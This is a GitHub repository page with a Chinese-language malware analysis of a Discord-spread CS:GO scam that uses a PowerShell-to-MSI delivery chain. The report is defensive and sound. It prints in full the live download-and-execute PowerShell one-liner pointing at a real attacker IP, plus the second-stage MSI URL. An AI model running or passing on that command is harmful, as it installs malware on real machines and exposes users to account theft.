MessyToilet/csgo-scam-via-powershell-5-31-2026

GitHub: MessyToilet/csgo-scam-via-powershell-5-31-2026

一份针对通过 Discord 社会工程学传播的 CS:GO 诈骗恶意软件的 PowerShell-to-MSI 投递链分析报告,涵盖完整的去混淆、MSI 提取和可疑文件逆向过程。

Stars: 1 | Forks: 0

# 可疑 PowerShell 传递的 MSI 分析报告 ## 总结 本次分析始于一段可疑的 PowerShell 单行命令: ``` powershell -c "iex(irm '85.239.149.40/FnjVsLKEJb2Jall3wx' -UseBasicParsing)" ``` 该命令从原始 IP 地址下载远程 PowerShell 代码,并立即使用 `Invoke-Expression` 在内存中执行。这种模式通常与 loader、dropper 和恶意软件投递链相关。 下载的脚本经过了严重的混淆。它包含许多垃圾变量和一个分割在多个变量中的大型 Base64 编码 payload。经过去混淆后,发现该脚本会解码并执行第二阶段的 PowerShell 脚本。 第二阶段脚本从以下位置下载了一个 MSI 安装包: ``` http://85.239.149.40:6600/5sxu2qr5/UICBDMW.msi ``` 脚本将其保存在: ``` C:\ProgramData\Zooms\UICBDMW.msi ``` 并使用 `msiexec` 静默执行了该文件。 ## 报告的传播背景 据报道,该样本是通过 Discord 上的社会工程学进行传播的。涉嫌的诈骗者使用 Discord 机器人或基于 Discord 的交互来诱骗用户运行 PowerShell 命令,声称这是游玩 FACEIT / CS:GO 所必需的。 提供给受害者的初始命令是: ``` powershell -c "iex(irm '85.239.149.40/FnjVsLKEJb2Jall3wx' -UseBasicParsing)" ## 执行 Chain The observed execution chain was: ```text PowerShell one-liner → Invoke-RestMethod downloads script from raw IP → Invoke-Expression executes script in memory → Obfuscated PowerShell decodes Base64 payload → Hidden PowerShell process launches second-stage script → Second-stage script downloads MSI from raw IP on port 6600 → MSI is executed silently ``` 这种传递方式十分可疑,因为它使用了: * 从原始 IP 地址执行远程脚本 * 严重的 PowerShell 混淆 * Base64 编码的分阶段 payload * 隐藏的 PowerShell 执行 * 绕过执行策略 * 静默安装 MSI ## MSI 分析结果 该 MSI 文件被提取并使用 `7z` 进行了检查。它包含了 16 个嵌入式文件。其中大多数是 Windows PE 文件(主要是 DLL),外加一个 GUI 可执行文件和两个通用数据文件。 MSI 的元数据很不寻常: ``` ProductName: Sizarship Manufacturer: Veil Patron Install folder: LocalAppDataFolder\Teel ``` 这些名称与安装包中表面上存在的 CapCut/ByteDance 组件并不匹配。 MSI 文件表将随机的内部文件名映射到了已安装的文件名,例如: ``` P0kk0eAnsGQS → EPixe20.exe GkCaSpXcg95SIo8m → Qt6Core.dll Y8p1Gq0n7iNF → VEConfig.dll S3cwB5EdKcaF4u5M → VECrashMonitor.dll t0Mhrk0VAbsv → VESafeGuard.dll ICnGNGxT → libcrypto-1_1-x64.dll iXzxVqBqNYNtJjOM5gz → libssl-1_1-x64.dll viM6fon1J7MG1Wb → libcurl.dll US8yBGmyj → tracker32.bin Pm7KFbOWP5 → buffer-layer.tmp ``` 主可执行文件似乎是: ``` EPixe20.exe ``` 该 MSI 似乎还包含一个名为以下内容的自定义操作: ``` LaunchFile ``` 这可能会在安装完成后启动已安装的可执行文件。 ## CapCut / ByteDance 指标 几个提取出的文件包含与 CapCut 或 ByteDance 相关的字符串。主可执行文件和 DLL 引用了诸如以下的组件: ``` CapCut.exe VEConfig.dll VESafeGuard.dll VECrashMonitor.dll Qt6Core.dll libcurl.dll ``` 一些文件还包含与 CapCut 相关的 API endpoint 和与 ByteDance 相关的字符串。从至少两个 PE 文件中提取的证书数据显示了 ByteDance 代码签名证书链。 这表明该 MSI 可能包含真实的 CapCut/ByteDance 组件,或者是从不合法的 CapCut 安装中复制的组件。 然而,可疑的传递链、伪造的 MSI 元数据、被重命名的可执行文件以及不寻常的安装路径表明,这很可能是一个被重新打包或伪造的安装包,而不是正常的 CapCut 安装包。 ## `tracker32.bin` 分析 最令人感兴趣的文件之一是: ``` US8yBGmyj → tracker32.bin ``` 该文件具有高熵值: ``` tracker32.bin size: 2,279,810 bytes entropy: 7.913 ``` 初始文件分析将其识别为通用数据。它似乎不是正常的可执行文件、ZIP 归档、gzip 文件、7z 归档、SQLite 数据库或正常的 PNG 图像。 进一步的检查发现了许多 PNG 样式的 chunk 标记: ``` IDAT IEND ``` 该文件包含重复的 `IDAT` chunk,并以看起来有效的 `IEND` 标记结束。手动解析显示: ``` 277 chunks IDAT chunks mostly 8192 bytes IEND chunk at the end 0 bad CRCs ``` 这意味着该文件使用了有效的 PNG 样式 chunk 框架: ``` [length][IDAT][data][CRC] [length][IDAT][data][CRC] ... [IEND] ``` 然而,合并后的 IDAT 数据未能通过正常的 PNG/zlib 解压: ``` zlib: incorrect header check raw deflate: invalid block type gzip: not a gzipped file bz2: invalid data stream lzma/xz: unsupported input ``` 这表明 `tracker32.bin` 并不是一个有效的 PNG 图像,尽管它使用了类似 PNG 的 chunk 结构。 最可能的解释是: 1. 一个使用 PNG 样式 chunk 的自定义资源容器 2. 一个加密或打包的资源 blob 3. 一个非标准的应用程序数据文件 4. 捆绑应用程序使用的诱饵或混淆资产 在这个阶段,虽然尚未证明 `tracker32.bin` 是可执行的恶意软件,但由于其具有高熵值、非标准性且经过了蓄意结构化,因此仍然十分可疑。 ## 当前评估 根据目前收集到的证据,应将该样本视为可疑或恶意样本。 最强烈的可疑指标包括: * 从原始 IP 执行远程 PowerShell * 经过混淆的 Base64 PowerShell loader * 隐藏的 PowerShell 执行 * 绕过执行策略 * 从非标准端口的原始 IP 下载 MSI * 静默执行 MSI * 看起来伪造的 MSI 产品和制造商元数据 * 安装到奇怪的 LocalAppData 文件夹中 * 主可执行文件被重命名为 `EPixe20.exe` * 在伪造的安装程序品牌下捆绑 CapCut/ByteDance 组件 * 存在一个名为 `tracker32.bin` 且不透明、具有高熵值的文件 目前的分析尚未证明其存在账户盗窃、Steam 盗窃、Gmail 盗窃或浏览器凭据盗窃的行为。在目前完成的步骤中,尚未确认存在用于 Steam、Gmail、浏览器 cookie 盗窃、Discord token 盗窃或密码窃取的明确静态字符串。 当前最佳的分类是: ``` Suspicious PowerShell-delivered fake/repackaged CapCut-like MSI installer. Likely unwanted or malicious delivery chain. Contains signed CapCut/ByteDance-looking components and an opaque high-entropy resource blob. No confirmed credential-stealing behavior yet from static analysis performed so far. ``` ## 建议提交至 VirusTotal 的集合 以下文件值得单独提交: ``` Original PowerShell script decoded.ps1 UICBDMW.msi EPixe20.exe / P0kk0eAnsGQS Qt6Core.dll / GkCaSpXcg95SIo8m VEConfig.dll / Y8p1Gq0n7iNF tracker32.bin / US8yBGmyj tracker32_idat_payload.bin buffer-layer.tmp / Pm7KFbOWP5 ``` 建议的 VirusTotal 评论: ``` Suspicious PowerShell-delivered MSI. Initial command uses IEX/IRM from raw IP 85.239.149.40. Obfuscated PowerShell decodes a second stage, launches hidden PowerShell with execution policy bypass, downloads UICBDMW.msi from 85.239.149.40:6600, and silently installs it. MSI metadata uses fake-looking ProductName “Sizarship” and Manufacturer “Veil Patron”, installs to LocalAppDataFolder\Teel, and launches EPixe20.exe. Extracted files include signed CapCut/ByteDance-looking components plus opaque high-entropy tracker32.bin using valid PNG-style IDAT/IEND chunks with non-zlib data. ``` ## 结论 应将该样本视为恶意或高度可疑的样本。 技术证据证实了可疑的分阶段 PowerShell 到 MSI 传递链。据报道的传播方式——在游玩 FACEIT / CS:GO 的借口下进行的 Discord 社会工程学——进一步印证了其恶意意图。 一份已确认的受害者报告声称,在执行后发生了 Gmail 被访问和 Steam 账户被临时接管的情况。然而,到目前为止执行的分析尚未确定确切的凭据盗窃机制。需要进一步的行为分析,以证明该样本是否会窃取浏览器 cookie、Steam 会话文件、Gmail/Google token 或凭据。
标签:AI合规, DAST, DNS 反向解析, IPv6, Libemu, OpenCanary, PowerShell, 云资产清单, 威胁情报, 安全研究报告, 开发者工具, 恶意软件分析, 网络信息收集, 逆向工程